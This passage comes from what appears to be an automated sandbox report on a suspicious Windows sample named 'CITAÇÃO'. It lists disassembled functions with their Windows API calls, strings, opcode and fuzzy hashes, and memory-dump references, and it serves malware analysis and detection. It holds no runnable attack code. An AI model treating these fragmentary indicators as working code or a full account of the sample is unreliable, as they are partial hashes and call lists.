                                                      • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                      • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                      • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                      Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                      • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                      • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                      • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                      Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                      • _fseek.LIBCMT ref: 00452B3B
                                                      • __wsplitpath.LIBCMT ref: 00452B9B
                                                      • _wcscpy.LIBCMT ref: 00452BB0
                                                      • _wcscat.LIBCMT ref: 00452BC5
                                                      • __wsplitpath.LIBCMT ref: 00452BEF
                                                      • _wcscat.LIBCMT ref: 00452C07
                                                      • _wcscat.LIBCMT ref: 00452C1C
                                                      • __fread_nolock.LIBCMT ref: 00452C53
                                                      • __fread_nolock.LIBCMT ref: 00452C64
                                                      • __fread_nolock.LIBCMT ref: 00452C83
                                                      • __fread_nolock.LIBCMT ref: 00452C94
                                                      • __fread_nolock.LIBCMT ref: 00452CB5
                                                      • __fread_nolock.LIBCMT ref: 00452CC6
                                                      • __fread_nolock.LIBCMT ref: 00452CD7
                                                      • __fread_nolock.LIBCMT ref: 00452CE8
                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                      • __fread_nolock.LIBCMT ref: 00452D78
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                      • String ID:
                                                      • API String ID: 2054058615-0
                                                      • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                      • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                      • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                      • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                      Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Window
                                                      • String ID: 0
                                                      • API String ID: 2353593579-4108050209
                                                      • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                      • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                      • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                      • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                      Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                      • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                      • GetWindowDC.USER32(?), ref: 0044A0F6
                                                      • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                      • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                      • GetSysColor.USER32(0000000F), ref: 0044A131
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                      • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                      • GetSysColor.USER32(00000005), ref: 0044A15B
                                                      • GetWindowDC.USER32(?), ref: 0044A1BE
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                      • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                      • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                      • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                      • GetSysColor.USER32(00000008), ref: 0044A265
                                                      • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                      • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                      • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                      • String ID:
                                                      • API String ID: 1744303182-0
                                                      • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                      • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                      • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                      • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                      Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                      • __mtterm.LIBCMT ref: 00417C34
                                                        • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                        • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                        • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                        • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                      • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                      • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                      • __init_pointers.LIBCMT ref: 00417CE6
                                                      • __calloc_crt.LIBCMT ref: 00417D54
                                                      • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                      • API String ID: 4163708885-3819984048
                                                      • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                      • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                      • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                      • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                      Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __wcsicoll$IconLoad
                                                      • String ID: blank$info$question$stop$warning
                                                      • API String ID: 2485277191-404129466
                                                      • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                      • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                      • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                      • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                      Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                      • SetWindowTextW.USER32(?,?), ref: 00454678
                                                      • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                      • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                      • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                      • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                      • GetWindowRect.USER32(?,?), ref: 004546F5
                                                      • SetWindowTextW.USER32(?,?), ref: 00454765
                                                      • GetDesktopWindow.USER32 ref: 0045476F
                                                      • GetWindowRect.USER32(00000000), ref: 00454776
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                      • GetClientRect.USER32(?,?), ref: 004547D2
                                                      • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                      • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                      • String ID:
                                                      • API String ID: 3869813825-0
                                                      • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                      • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                      • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                      • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                      Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00464B28
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                      • _wcslen.LIBCMT ref: 00464C28
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                      • _wcslen.LIBCMT ref: 00464CBA
                                                      • _wcslen.LIBCMT ref: 00464CD0
                                                      • _wcslen.LIBCMT ref: 00464CEF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$Directory$CurrentSystem
                                                      • String ID: D
                                                      • API String ID: 1914653954-2746444292
                                                      • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                      • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                      • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                      • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                      Function 0045CD1E Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _wcsncpy.LIBCMT ref: 0045CE39
                                                      • __wsplitpath.LIBCMT ref: 0045CE78
                                                      • _wcscat.LIBCMT ref: 0045CE8B
                                                      • _wcscat.LIBCMT ref: 0045CE9E
                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                      • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                      • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                      • _wcscpy.LIBCMT ref: 0045CF61
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                      • String ID: *.*
                                                      • API String ID: 1153243558-438819550
                                                      • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                      • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                      • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                      • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                      Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __wcsicoll
                                                      • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                      • API String ID: 3832890014-4202584635
                                                      • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                      • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                      • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                      • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                      Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                      • GetFocus.USER32 ref: 0046A0DD
                                                      • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$CtrlFocus
                                                      • String ID: 0
                                                      • API String ID: 1534620443-4108050209
                                                      • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                      • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                      • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                      • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                      Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(?), ref: 004558E3
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Window$CreateDestroy
                                                      • String ID: ,$tooltips_class32
                                                      • API String ID: 1109047481-3856767331
                                                      • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
